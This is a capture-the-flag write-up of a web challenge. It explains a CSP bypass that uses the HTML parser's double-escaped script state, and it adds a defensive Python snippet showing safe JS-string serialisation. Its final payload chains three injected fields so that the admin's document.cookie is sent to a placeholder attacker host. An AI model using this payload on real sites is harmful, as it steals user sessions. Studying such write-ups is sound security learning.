@mdsnins
Created March 26, 2022 23:09
[LINE CTF 2021] Haribote-Secure-Note

Haribote-Secure-Note

LINECTF 2021 - Web
Writeup by Payload as Super HexaGoN

CSP

CSP is applied on this page. Since a nonce- source directive is used, we have to reuse an existing script tag that already carries a valid nonce.

Two Injection Points

First, we can inject a display name of up to 16 bytes into the admin-restricted page.

const sharedUserName = "{{ shared_user_name }}";

Second, we can inject 64 and 128 bytes respectively into the two rendered data fields. However, since the single quote is escaped there, we can't reuse this script tag.

Commenting all

Then, we can think of commenting out everything between the first and second injection points, but </script> takes priority over a JS comment, so in the normal case it breaks the comment in the middle.
However, when we open another script tag inside an HTML comment in script context, as <script><!--<script>, the HTML parser switches to the "script data double escaped" state, in which the </script> in the middle no longer closes the script element.
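The root cause is that the template escapes only quote characters when embedding user input in a JS string literal, leaving <, > and / untouched. As an added example (not part of the original writeup or the challenge code), this Python snippet contrasts that quote-only escaping with JSON serialisation that also escapes the HTML-significant characters, and checks that the parser-state trigger sequences can no longer appear in the rendered script; the function names and sample values are constructed for the example.

```python
import json

# Constructed sample display names (not from the challenge server): a benign one,
# one that tries to open the script-data-double-escaped state, and one with </script>.
SAMPLE_NAMES = ["Alice", '<!--<script>"}/*', "it's </script>"]

# Sequences that change HTML parser state inside a <script> element.
PARSER_TRIGGERS = ("<!--", "<script", "</script")


def weak_js_string(value: str) -> str:
    """The kind of escaping the writeup describes: only backslash and the quote
    character are escaped, so '<', '>' and '/' reach the HTML parser verbatim."""
    return '"' + value.replace("\\", "\\\\").replace('"', '\\"') + '"'


def safe_js_string(value: str) -> str:
    """JSON-serialise the value, then additionally escape the characters that matter
    to the HTML parser inside <script>. '\\u003c' is a valid JS string escape, so
    the literal still decodes to the original text but can never spell '<!--',
    '<script' or '</script' in the page source."""
    encoded = json.dumps(value)
    return (encoded.replace("<", "\\u003c")
                   .replace(">", "\\u003e")
                   .replace("&", "\\u0026"))


def render_template(serialise, shared_user_name: str) -> str:
    """Mimics the template line from the writeup with a chosen serialiser."""
    return "const sharedUserName = %s;" % serialise(shared_user_name)


def contains_parser_trigger(rendered: str) -> bool:
    """True if the rendered script contains any parser-state trigger sequence."""
    low = rendered.lower()
    return any(t in low for t in PARSER_TRIGGERS)


def roundtrip(value: str) -> str:
    """Decode the safely serialised literal (JSON and JS share these escapes)."""
    return json.loads(safe_js_string(value))


if __name__ == "__main__":
    for name in SAMPLE_NAMES:
        for label, fn in (("weak", weak_js_string), ("safe", safe_js_string)):
            out = render_template(fn, name)
            print(label, contains_parser_trigger(out), out)
```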

Final Payload

display name : <!--<script>"}/* title : --> /* content : */ location.href='(attacker)/c='+document.cookie

LINECTF{0n1y_u51ng_m0d3rn_d3fen5e_m3ch4n15m5_i5_n0t_3n0ugh_t0_0bt41n_c0mp13te_s3cur17y}
